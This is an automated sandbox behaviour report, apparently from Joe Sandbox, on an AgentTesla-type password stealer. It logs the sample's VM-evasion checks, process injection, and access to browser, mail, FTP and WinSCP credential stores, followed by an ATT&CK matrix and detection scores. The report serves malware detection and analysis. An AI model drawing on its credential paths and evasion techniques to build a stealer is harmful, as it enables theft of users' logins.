                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                    Malware Analysis System Evasion

                    barindex
                    Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exeMemory allocated: 1330000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exeMemory allocated: 3010000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exeMemory allocated: 5010000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exeMemory allocated: 8750000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exeMemory allocated: 9750000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exeMemory allocated: 9930000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exeMemory allocated: A930000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exeMemory allocated: 1870000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exeMemory allocated: 32B0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exeMemory allocated: 31C0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exeWindow / User API: threadDelayed 597Jump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe TID: 5680Thread sleep time: -3689348814741908s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe TID: 7084Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe, 00000003.00000002.3283905345.00000000016A7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exeProcess information queried: ProcessInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exeMemory allocated: page read and write | page guardJump to behavior

                    HIPS / PFW / Operating System Protection Evasion

                    barindex
                    Injects a PE file into a foreign processes
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exeMemory written: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe base: 400000 value starts with: 4D5AJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exeProcess created: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                    Stealing of Sensitive Information

                    barindex
                    Yara detected AgentTesla
                    Source: Yara matchFile source: dump.pcap, type: PCAP
                    Source: Yara matchFile source: 3.2.SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe.4077b18.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe.403d6f8.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe.4077b18.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe.403d6f8.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000003.00000002.3285205060.00000000032FE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000002.3283129329.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.2051691772.000000000403D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000002.3285205060.00000000032B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe PID: 3364, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe PID: 4320, type: MEMORYSTR
                    Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\SessionsJump to behavior
                    Tries to harvest and steal browser information (history, passwords, etc)
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exeFile opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.iniJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exeFile opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.iniJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                    Tries to harvest and steal ftp login credentials
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exeFile opened: C:\FTP Navigator\Ftplist.txtJump to behavior
                    Tries to steal Mail credentials (via file / registry access)
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\ProfilesJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
                    Source: Yara matchFile source: 3.2.SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe.4077b18.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe.403d6f8.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe.4077b18.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe.403d6f8.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000003.00000002.3283129329.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.2051691772.000000000403D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000002.3285205060.00000000032B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe PID: 3364, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe PID: 4320, type: MEMORYSTR

                    Remote Access Functionality

                    barindex
                    Yara detected AgentTesla
                    Source: Yara matchFile source: dump.pcap, type: PCAP
                    Source: Yara matchFile source: 3.2.SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe.4077b18.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe.403d6f8.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe.4077b18.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe.403d6f8.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000003.00000002.3285205060.00000000032FE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000002.3283129329.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.2051691772.000000000403D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000002.3285205060.00000000032B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe PID: 3364, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe PID: 4320, type: MEMORYSTR

                    Mitre Att&ck Matrix

                    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                    Gather Victim Identity InformationAcquire InfrastructureValid Accounts121
                    Windows Management Instrumentation                    		1
                    DLL Side-Loading                    		111
                    Process Injection                    		1
                    Masquerading                    		2
                    OS Credential Dumping                    		111
                    Security Software Discovery                    		Remote Services1
                    Email Collection                    		1
                    Encrypted Channel                    		1
                    Exfiltration Over Alternative Protocol                    		Abuse Accessibility Features
                    CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
                    DLL Side-Loading                    		1
                    Disable or Modify Tools                    		1
                    Input Capture                    		1
                    Process Discovery                    		Remote Desktop Protocol1
                    Input Capture                    		1
                    Non-Standard Port                    		Exfiltration Over BluetoothNetwork Denial of Service
                    Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)141
                    Virtualization/Sandbox Evasion                    		1
                    Credentials in Registry                    		141
                    Virtualization/Sandbox Evasion                    		SMB/Windows Admin Shares11
                    Archive Collected Data                    		1
                    Non-Application Layer Protocol                    		Automated ExfiltrationData Encrypted for Impact
                    Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook111
                    Process Injection                    		NTDS1
                    Application Window Discovery                    		Distributed Component Object Model2
                    Data from Local System                    		11
                    Application Layer Protocol                    		Traffic DuplicationData Destruction
                    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                    Deobfuscate/Decode Files or Information                    		LSA Secrets1
                    File and Directory Discovery                    		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                    Obfuscated Files or Information                    		Cached Domain Credentials24
                    System Information Discovery                    		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items22
                    Software Packing                    		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                    Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                    DLL Side-Loading                    		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

                    Behavior Graph

                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet

                    Screenshots

                    Thumbnails

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                    windows-stand

                    Antivirus, Machine Learning and Genetic Malware Detection

                    Initial Sample

                    SourceDetectionScannerLabelLink
                    SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe36%VirustotalBrowse
                    SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe50%ReversingLabsByteCode-MSIL.Packed.Generic
                    SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe100%AviraHEUR/AGEN.1309856
                    SecuriteInfo.com.Win32.PWSX-gen.20769.7015.exe100%Joe Sandbox ML

                    Dropped Files

                    No Antivirus matches

                    Unpacked PE Files

                    No Antivirus matches

                    Domains

